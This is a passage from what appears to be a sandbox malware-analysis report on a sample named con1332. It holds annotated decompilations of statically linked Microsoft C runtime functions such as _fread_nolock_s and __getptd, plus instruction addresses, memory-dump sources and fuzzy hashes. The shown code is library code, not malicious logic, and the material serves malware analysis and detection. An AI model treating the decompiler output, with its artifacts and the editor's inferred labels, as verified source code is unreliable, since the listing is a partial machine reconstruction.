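        return stream == NULL ? PROLOGUE_EINVAL_STREAM : PROLOGUE_EINVAL_OVERFLOW;
    }

    *total = elementSize * count;   /* safe: the division check rules out wrap */

    /* anybuf(stream): a buffer is already attached, so use its recorded size;
     * otherwise assume the 4 KiB buffer the CRT allocates on first use. */
    *streambufsize = (stream->_flag & MSVCRT_ANYBUF) ? (size_t)stream->_bufsiz
                                                     : MSVCRT_INTERNAL_BUFSIZ;
    return PROLOGUE_OK;
}

/* Small helper for checks: non-zero when every byte of p[0..n) is zero. */
int all_zero(const unsigned char *p, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (p[i] != 0) return 0;
    return 1;
}

int main(void)
{
    unsigned char buf[16];             /* constructed caller buffer */
    size_t total = 0, sbs = 0;
    crt_file_t f = {0};                /* constructed stream with no buffer yet */
    memset(buf, 'A', sizeof buf);
    prologue_result_t r = fread_s_prologue(buf, sizeof buf, SIZE_MAX / 2 + 1, 2,
                                           &f, &total, &sbs);
    printf("overflow request -> result %d, buffer zeroed: %d\n",
           (int)r, all_zero(buf, sizeof buf));
    return 0;
}
```

Reading the decompilation against this: `_a12`/`_a16` are `elementSize`/`count`, the `E0040BA30(..., _t121, 0, _t119)` call is the `memset(buffer, 0, bufferSize)` scrub, `_t94 | 0xffffffff` followed by `/ _a12` is the `SIZE_MAX / elementSize` division, and the `0x10c` test on `_t133 + 0xc` selects between `stream->_bufsiz` and `0x1000`.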
C-Code - Quality: 85%
/* Decompiled E0040BCC2. Argument order, checks and constants match the statically
   linked MSVCRT _fread_nolock_s(buffer, bufferSize, elementSize, count, stream):
   _a4 = buffer, _a8 = bufferSize, _a12 = elementSize, _a16 = count, _a20 = FILE*.
   CRT library code linked into the sample, not stealer logic. Comments added by
   the editor; the statements are the decompiler's output, left unchanged. */
E0040BCC2(signed int __edx, char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
	signed int _v8;      /* bufferSize */
	char* _v12;          /* buffer */
	signed int _v16;     /* stream buffer size: stream->_bufsiz or the 0x1000 default */
	signed int _v20;     /* total bytes requested: elementSize * count */
	void* __ebx;
	void* __edi;
	void* __esi;
	void* __ebp;
	signed int _t90;
	intOrPtr* _t92;
	signed int _t94;
	char _t97;
	signed int _t105;
	void* _t106;
	signed int _t107;
	signed int _t110;
	signed int _t113;
	intOrPtr* _t114;
	signed int _t118;
	signed int _t119;
	signed int _t120;
	char* _t121;
	signed int _t125;
	signed int _t131;
	signed int _t133;
	void* _t134;

	_t125 = __edx;
	_t121 = _a4;                       /* buffer */
	_t119 = _a8;                       /* bufferSize */
	_t131 = 0;
	_v12 = _t121;
	_v8 = _t119;
	if(_a12 == 0 || _a16 == 0) {       /* elementSize == 0 || count == 0: nothing to read */
		L5:
		return 0;
	} else {
		_t138 = _t121;                 /* decompiler artifact: _t138 is never declared or used */
		if(_t121 != 0) {               /* buffer != NULL (the NULL case lies beyond this excerpt) */
			_t133 = _a20;              /* stream */
			__eflags = _t133;
			if(_t133 == 0) {           /* stream == NULL */
				L9:
				__eflags = _t119 - 0xffffffff;
				if(_t119 != 0xffffffff) {   /* bufferSize known (not SIZE_MAX): scrub caller's buffer before failing */
					_t90 = E0040BA30(_t131, _t121, _t131, _t119);   /* memset(buffer, 0, bufferSize) */
					_t134 = _t134 + 0xc;                            /* cdecl stack clean-up for three arguments */
				}
				__eflags = _t133 - _t131;
				if(__eflags == 0) {
					goto L3;           /* stream == NULL: invalid-parameter path (L3 is outside this excerpt) */
				} else {
					_t94 = _t90 | 0xffffffff;          /* SIZE_MAX on 32-bit */
					_t125 = _t94 % _a12;
					__eflags = _a16 - _t94 / _a12;     /* count vs. SIZE_MAX / elementSize */
					if(__eflags > 0) {
						goto L3;       /* count > SIZE_MAX / elementSize: the product would wrap, reject */
					}
					L13:
					_t131 = _a12 * _a16;               /* total = elementSize * count, safe after the check above */
					__eflags =  *(_t133 + 0xc) & 0x0000010c;   /* stream->_flag & (_IOYOURBUF | _IOMYBUF | _IONBF) */
					_v20 = _t131;
					_t120 = _t131;
					if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
						_v16 = 0x1000;                 /* no buffer attached yet: assume the default 4 KiB one */
					} else {
						_v16 =  *((intOrPtr*)(_t133 + 0x18));   /* stream->_bufsiz */
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								__eflags = _t131;
                                                                                                                                                                                                                                    								if(_t131 == 0) {
                                                                                                                                                                                                                                    									L40:
                                                                                                                                                                                                                                    									return _a16;
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									do {
                                                                                                                                                                                                                                    										__eflags =  *(_t133 + 0xc) & 0x0000010c;
                                                                                                                                                                                                                                    										if(( *(_t133 + 0xc) & 0x0000010c) == 0) {
                                                                                                                                                                                                                                    											L24:
                                                                                                                                                                                                                                    											__eflags = _t120 - _v16;
                                                                                                                                                                                                                                    											if(_t120 < _v16) {
                                                                                                                                                                                                                                    												_t97 = E0040FC07(_t120, _t125, _t133);
                                                                                                                                                                                                                                    												__eflags = _t97 - 0xffffffff;
                                                                                                                                                                                                                                    												if(_t97 == 0xffffffff) {
                                                                                                                                                                                                                                    													L48:
                                                                                                                                                                                                                                    													return (_t131 - _t120) / _a12;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												__eflags = _v8;
                                                                                                                                                                                                                                    												if(_v8 == 0) {
                                                                                                                                                                                                                                    													L44:
                                                                                                                                                                                                                                    													__eflags = _a8 - 0xffffffff;
                                                                                                                                                                                                                                    													if(__eflags != 0) {
                                                                                                                                                                                                                                    														E0040BA30(_t131, _a4, 0, _a8);
                                                                                                                                                                                                                                    														_t134 = _t134 + 0xc;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    													 *((intOrPtr*)(E0040BFC1(__eflags))) = 0x22;
                                                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                                                    													_push(0);
                                                                                                                                                                                                                                    													L4:
                                                                                                                                                                                                                                    													E0040E744(_t125, _t131, _t133);
                                                                                                                                                                                                                                    													goto L5;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t123 = _v12;
                                                                                                                                                                                                                                    												_v12 = _v12 + 1;
                                                                                                                                                                                                                                    												 *_v12 = _t97;
                                                                                                                                                                                                                                    												_t120 = _t120 - 1;
                                                                                                                                                                                                                                    												_t70 =  &_v8;
                                                                                                                                                                                                                                    												 *_t70 = _v8 - 1;
                                                                                                                                                                                                                                    												__eflags =  *_t70;
                                                                                                                                                                                                                                    												_v16 =  *((intOrPtr*)(_t133 + 0x18));
                                                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _v16;
                                                                                                                                                                                                                                    											if(_v16 == 0) {
                                                                                                                                                                                                                                    												_t105 = 0x7fffffff;
                                                                                                                                                                                                                                    												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                                                    												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                                                    													_t105 = _t120;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												__eflags = _t120 - 0x7fffffff;
                                                                                                                                                                                                                                    												if(_t120 <= 0x7fffffff) {
                                                                                                                                                                                                                                    													_t55 = _t120 % _v16;
                                                                                                                                                                                                                                    													__eflags = _t55;
                                                                                                                                                                                                                                    													_t125 = _t55;
                                                                                                                                                                                                                                    													_t110 = _t120;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t125 = 0x7fffffff % _v16;
                                                                                                                                                                                                                                    													_t110 = 0x7fffffff;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_t105 = _t110 - _t125;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    											__eflags = _t105 - _v8;
                                                                                                                                                                                                                                    											if(_t105 > _v8) {
                                                                                                                                                                                                                                    												goto L44;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_push(_t105);
                                                                                                                                                                                                                                    												_push(_v12);
                                                                                                                                                                                                                                    												_t106 = E0040FA20(_t125, _t131, _t133);
                                                                                                                                                                                                                                    												_pop(_t123);
                                                                                                                                                                                                                                    												_push(_t106);
                                                                                                                                                                                                                                    												_t107 = E004102F4(_t120, _t125, _t131, _t133, __eflags);
                                                                                                                                                                                                                                    												_t134 = _t134 + 0xc;
                                                                                                                                                                                                                                    												__eflags = _t107;
                                                                                                                                                                                                                                    												if(_t107 == 0) {
                                                                                                                                                                                                                                    													 *(_t133 + 0xc) =  *(_t133 + 0xc) | 0x00000010;
                                                                                                                                                                                                                                    													goto L48;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												__eflags = _t107 - 0xffffffff;
                                                                                                                                                                                                                                    												if(_t107 == 0xffffffff) {
                                                                                                                                                                                                                                    													L47:
                                                                                                                                                                                                                                    													_t80 = _t133 + 0xc;
                                                                                                                                                                                                                                    													 *_t80 =  *(_t133 + 0xc) | 0x00000020;
                                                                                                                                                                                                                                    													__eflags =  *_t80;
                                                                                                                                                                                                                                    													goto L48;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												_v12 = _v12 + _t107;
                                                                                                                                                                                                                                    												_t120 = _t120 - _t107;
                                                                                                                                                                                                                                    												_v8 = _v8 - _t107;
                                                                                                                                                                                                                                    												goto L39;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t113 =  *(_t133 + 4);
                                                                                                                                                                                                                                    										__eflags = _t113;
                                                                                                                                                                                                                                    										if(__eflags == 0) {
                                                                                                                                                                                                                                    											goto L24;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										if(__eflags < 0) {
                                                                                                                                                                                                                                    											goto L47;
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t131 = _t120;
                                                                                                                                                                                                                                    										__eflags = _t120 - _t113;
                                                                                                                                                                                                                                    										if(_t120 >= _t113) {
                                                                                                                                                                                                                                    											_t131 = _t113;
                                                                                                                                                                                                                                    										}
                            __eflags = _t131 - _v8;
                            if(_t131 > _v8) {
                                _t133 = 0;
                                __eflags = _a8 - 0xffffffff;
                                if(__eflags != 0) {
                                    E0040BA30(_t131, _a4, 0, _a8);
                                    _t134 = _t134 + 0xc; /* caller-cleaned stack after the cdecl call */
                                }
                                _t114 = E0040BFC1(__eflags);
                                _push(_t133);
                                _push(_t133);
                                _push(_t133);
                                _push(_t133);
                                *_t114 = 0x22; /* 0x22 = 34 decimal = ERANGE in the MSVC CRT; that E0040BFC1 returns the errno slot is an editor's inference, the report does not label it */
                                _push(_t133);
                                goto L4;
                            } else {
                                E004103F1(_t120, _t123, _t125, _v12, _v8, *_t133, _t131);
                                *(_t133 + 4) = *(_t133 + 4) - _t131;
                                *_t133 = *_t133 + _t131;
                                _v12 = _v12 + _t131;
                                _t120 = _t120 - _t131;
                                _t134 = _t134 + 0x10;
                                _v8 = _v8 - _t131;
                                _t131 = _v20;
                            }
                            L39:
                            __eflags = _t120;
                        } while (_t120 != 0);
                        goto L40;
                    }
                }
            }
            _t118 = _t90 | 0xffffffff;
            _t90 = _t118 / _a12;  /* 0xffffffff / _a12 compared against _a16: reads as a count-times-size overflow guard (editor's reading) */
            _t125 = _t118 % _a12;
            __eflags = _a16 - _t90;
            if(_a16 <= _t90) {
                goto L13;
            }
            goto L9;
        }
        L3:
        _t92 = E0040BFC1(_t138);
        _push(_t131);
        _push(_t131);
        _push(_t131);
        _push(_t131);
        *_t92 = 0x16; /* 0x16 = 22 decimal = EINVAL in the MSVC CRT (same inference as above) */
        _push(_t131);
        goto L4;
    }
}
Instruction addresses for the listing above, in listing order (0x00000000 where the line has no address):

0x0040bcc2 0x0040bcca 0x0040bcce 0x0040bcd3 0x0040bcd5 0x0040bcd8 0x0040bcde 0x0040bd01
0x00000000 0x0040bce5 0x0040bce5 0x0040bce7 0x0040bd08 0x0040bd0b 0x0040bd0d 0x0040bd1c
0x0040bd1c 0x0040bd1f 0x0040bd24 0x0040bd29 0x0040bd29 0x0040bd2c 0x0040bd2e 0x00000000
0x0040bd30 0x0040bd30 0x0040bd35 0x0040bd38 0x0040bd3b 0x00000000 0x00000000 0x0040bd3d
0x0040bd40 0x0040bd44 0x0040bd4b 0x0040bd4e 0x0040bd50 0x0040bd5a 0x0040bd52 0x0040bd55
0x0040bd55 0x0040bd61 0x0040bd63 0x0040be53 0x00000000 0x0040bd69 0x0040bd69 0x0040bd69
0x0040bd70 0x0040bdb6 0x0040bdb6 0x0040bdb9 0x0040be24 0x0040be2a 0x0040be2d 0x0040beb8
0x00000000 0x0040bebe 0x0040be33 0x0040be37 0x0040be87 0x0040be87 0x0040be8b 0x0040be95
0x0040be9a 0x0040be9a 0x0040bea2 0x0040beaa 0x0040beab 0x0040beac 0x0040bead 0x0040beae
0x0040bcf9 0x0040bcf9 0x00000000 0x0040bcfe 0x0040be39 0x0040be3c 0x0040be3f 0x0040be44
0x0040be45 0x0040be45 0x0040be45 0x0040be48 0x00000000 0x0040be48 0x0040bdbb 0x0040bdbf
0x0040bde0 0x0040bde5 0x0040bde7 0x0040bde9 0x0040bde9 0x0040bdc1 0x0040bdc8 0x0040bdca
                                                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                                                    0x0040bdd7
                                                                                                                                                                                                                                    0x0040bdda
                                                                                                                                                                                                                                    0x0040bdcc
                                                                                                                                                                                                                                    0x0040bdce
                                                                                                                                                                                                                                    0x0040bdd1
                                                                                                                                                                                                                                    0x0040bdd1
                                                                                                                                                                                                                                    0x0040bddc
                                                                                                                                                                                                                                    0x0040bddc
                                                                                                                                                                                                                                    0x0040bdeb
                                                                                                                                                                                                                                    0x0040bdee
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bdf4
                                                                                                                                                                                                                                    0x0040bdf4
                                                                                                                                                                                                                                    0x0040bdf5
                                                                                                                                                                                                                                    0x0040bdf9
                                                                                                                                                                                                                                    0x0040bdfe
                                                                                                                                                                                                                                    0x0040bdff
                                                                                                                                                                                                                                    0x0040be00
                                                                                                                                                                                                                                    0x0040be05
                                                                                                                                                                                                                                    0x0040be08
                                                                                                                                                                                                                                    0x0040be0a
                                                                                                                                                                                                                                    0x0040bec6
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bec6
                                                                                                                                                                                                                                    0x0040be10
                                                                                                                                                                                                                                    0x0040be13
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040beb4
                                                                                                                                                                                                                                    0x0040be19
                                                                                                                                                                                                                                    0x0040be1c
                                                                                                                                                                                                                                    0x0040be1e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040be1e
                                                                                                                                                                                                                                    0x0040bdee
                                                                                                                                                                                                                                    0x0040bd72
                                                                                                                                                                                                                                    0x0040bd75
                                                                                                                                                                                                                                    0x0040bd77
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd7f
                                                                                                                                                                                                                                    0x0040bd81
                                                                                                                                                                                                                                    0x0040bd83
                                                                                                                                                                                                                                    0x0040bd85
                                                                                                                                                                                                                                    0x0040bd85
                                                                                                                                                                                                                                    0x0040bd87
                                                                                                                                                                                                                                    0x0040bd8a
                                                                                                                                                                                                                                    0x0040be5b
                                                                                                                                                                                                                                    0x0040be5d
                                                                                                                                                                                                                                    0x0040be61
                                                                                                                                                                                                                                    0x0040be6a
                                                                                                                                                                                                                                    0x0040be6f
                                                                                                                                                                                                                                    0x0040be6f
                                                                                                                                                                                                                                    0x0040be72
                                                                                                                                                                                                                                    0x0040be77
                                                                                                                                                                                                                                    0x0040be78
                                                                                                                                                                                                                                    0x0040be79
                                                                                                                                                                                                                                    0x0040be7a
                                                                                                                                                                                                                                    0x0040be7b
                                                                                                                                                                                                                                    0x0040be81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd90
                                                                                                                                                                                                                                    0x0040bd99
                                                                                                                                                                                                                                    0x0040bd9e
                                                                                                                                                                                                                                    0x0040bda1
                                                                                                                                                                                                                                    0x0040bda3
                                                                                                                                                                                                                                    0x0040bda6
                                                                                                                                                                                                                                    0x0040bda8
                                                                                                                                                                                                                                    0x0040bdab
                                                                                                                                                                                                                                    0x0040bdae
                                                                                                                                                                                                                                    0x0040bdae
                                                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                                                    0x0040be4b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd69
                                                                                                                                                                                                                                    0x0040bd63
                                                                                                                                                                                                                                    0x0040bd2e
                                                                                                                                                                                                                                    0x0040bd0f
                                                                                                                                                                                                                                    0x0040bd14
                                                                                                                                                                                                                                    0x0040bd14
                                                                                                                                                                                                                                    0x0040bd17
                                                                                                                                                                                                                                    0x0040bd1a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bd1a
                                                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                                                    0x0040bce9
                                                                                                                                                                                                                                    0x0040bcee
                                                                                                                                                                                                                                    0x0040bcef
                                                                                                                                                                                                                                    0x0040bcf0
                                                                                                                                                                                                                                    0x0040bcf1
                                                                                                                                                                                                                                    0x0040bcf2
                                                                                                                                                                                                                                    0x0040bcf8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0040bcf8

APIs
Memory Dump Source
• Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmp
• Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
• String ID:
• API String ID: 3886058894-0
• Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
• Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
• Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3886058894-0
                                                                                                                                                                                                                                    • Opcode ID: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                    • Instruction ID: 373f9fc3f9bdb9be9ba98915995de5604a7aab3f5d72a533c6bd5cd3a9ac9513
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c8cdba87b669e5a45588b0eb276f39e335abb1b1e80ab099951c299220f7b7ba
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A351067190020DEBCBA0CF79CC4459EBFB6EF44328F1582AAEA25925D0D7719A99CF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: __fileno$__getptd_noexit__lock_file
                                                                                                                                                                                                                                    • String ID: 'B
                                                                                                                                                                                                                                    • API String ID: 3755561058-2787509829
                                                                                                                                                                                                                                    • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                    • Instruction ID: ef3179efe0fa66d2b47f84259548d7ce1fb736adc059c263de669045880c1037
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6016B3350062866C2A2EB785C4167D7BA1CF86B3036583CAD7709B5D0EB28C58AC955
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 90%
			/* Decompiler output. Temporaries the decompiler left undeclared are declared here;
			   _t29 holds the frame pointer (the SEH prolog at 0x4214d0 sets up ebp-relative
			   locals), so *(_t29 - 4) is the SEH try-level slot. Callee names follow the API
			   references below: E00410735 = __getptd, E0040D6E0 = __lock, E0040E79A = __amsg_exit. */
			E00414738(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
				signed int _t13;
				intOrPtr* _t8;
				void* _t22;
				void* _t25;
				intOrPtr _t26;
				intOrPtr _t28;
				void* _t29;   /* frame pointer (ebp) */
				void* _t30;
				intOrPtr _t32;

				_t30 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x4214d0);
				E0040E1D8(__ebx, __edi, __esi);           /* SEH prolog */
				_t28 = E00410735(__ebx, __edx, __edi, _t30); /* __getptd: per-thread data */
				_t13 =  *0x422e34; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t13) == 0) {
					L6:
					E0040D6E0(_t22, 0xc);                 /* __lock(0xc) */
					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
					_t8 = _t28 + 0x6c; // 0x6c
					_t26 =  *0x422f18; // 0x422e40
					 *((intOrPtr*)(_t29 - 0x1c)) = E004146FA(_t8, _t26);
					 *(_t29 - 4) = 0xfffffffe;
					E004147A2();                          /* unlock (SEH finally block) */
				} else {
					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(E00410735(_t22, __edx, _t26, _t32) + 0x6c));
					}
				}
				if(_t28 == 0) {
					E0040E79A(_t25, _t26, 0x20);          /* __amsg_exit(0x20): fatal runtime error */
				}
				return E0040E21D(_t28);                   /* SEH epilog */
			}
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 00414744
                                                                                                                                                                                                                                      • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                                                                                                                      • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                                                                                                                    • __getptd.LIBCMT ref: 0041475B
                                                                                                                                                                                                                                    • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                                                                                                                    • __lock.LIBCMT ref: 00414779
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.326634560.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.326634560.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_400000_con1332.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618
• Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
• Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• __getptd.LIBCMT ref: 02C049AB
  • Part of subcall function 02C0099C: __getptd_noexit.LIBCMT ref: 02C0099F
  • Part of subcall function 02C0099C: __amsg_exit.LIBCMT ref: 02C009AC
• __getptd.LIBCMT ref: 02C049C2
• __amsg_exit.LIBCMT ref: 02C049D0
• __lock.LIBCMT ref: 02C049E0
Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618
• Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction ID: 037f26a1135ee81d5cdf3a10987d837b9d429131fb4f0742e524f659b8c1f370
• Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction Fuzzy Hash: C5F05931E40700DBDB74FB74884076E73A57F00721F41416AC744AB2E0CB70A901EF55
Uniqueness
Uniqueness Score: -1.00%

APIs
• ___addlocaleref.LIBCMT ref: 02C04973
• ___removelocaleref.LIBCMT ref: 02C0497E
• ___freetlocinfo.LIBCMT ref: 02C04992
  • Part of subcall function 02C046F0: ___free_lconv_mon.LIBCMT ref: 02C04736
  • Part of subcall function 02C046F0: ___free_lconv_num.LIBCMT ref: 02C04757
  • Part of subcall function 02C046F0: ___free_lc_time.LIBCMT ref: 02C047DC
Strings
Memory Dump Source
• Source File: 0000000D.00000002.327606223.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2bf0000_con1332.jbxd
Yara matches
Similarity
• API ID: ___addlocaleref___free_lc_time___free_lconv_mon___free_lconv_num___freetlocinfo___removelocaleref
• String ID: @.B$@.B
• API String ID: 4212647719-183327057
• Opcode ID: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
• Instruction ID: 15c4857eec824830106d92c1d3af0ad69900191de04954467aa2089334b7390d
• Opcode Fuzzy Hash: 3857329619949c293296419ec2be8f51648e9d3bf58d3a63f1cc8ec60b1035b6
• Instruction Fuzzy Hash: 2AE02632D21A3105CA3D3B1C78C036B929E2FC3316B1B123EEA08E70C4DB644E80D4A8
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 77%
E0040C73D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
	intOrPtr _v8;
	void* _t16;
	void* _t17;
	intOrPtr _t19;
	void* _t21;
	signed int _t22;
	intOrPtr* _t27;
	intOrPtr _t39;
	intOrPtr _t40;
	intOrPtr _t50;

	_t37 = __edx;
	_push(8);
	_push(0x421140);
	E0040E1D8(__ebx, __edi, __esi);
	_t39 = _a4;
	_t50 = _t39;
	_t51 = _t50 != 0;
	if(_t50 != 0) {
		E0040FB29(_t39);
		_v8 = 0;
		 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0xffffffcf;
		_t16 = E0040FA20(__edx, _t39, _t39);
		__eflags = _t16 - 0xffffffff;
		if(_t16 == 0xffffffff) {
			L6:
			_t17 = 0x4227e0;
		} else {
			_t21 = E0040FA20(__edx, _t39, _t39);
			__eflags = _t21 - 0xfffffffe;
			if(_t21 == 0xfffffffe) {
				goto L6;
			} else {
				_t22 = E0040FA20(__edx, _t39, _t39);
				_t17 = ((E0040FA20(_t37, _t39, _t39) & 0x0000001f) << 6) +  *((intOrPtr*)(0x423f60 + (_t22 >> 5) * 4));
			}
		}
		_t9 = _t17 + 4; // 0xa80
		 *(_t17 + 4) =  *_t9 & 0x000000fd;
		_v8 = 0xfffffffe;
		E0040C735(_t39);
		_t19 = 0;
		__eflags = 0;
	} else {
		_t27 = E0040BFC1(_t51);
		_t40 = 0x16;
		 *_t27 = _t40;
		_push(0);
		_push(0);
		_push(0);
		_push(0);
		_push(0);
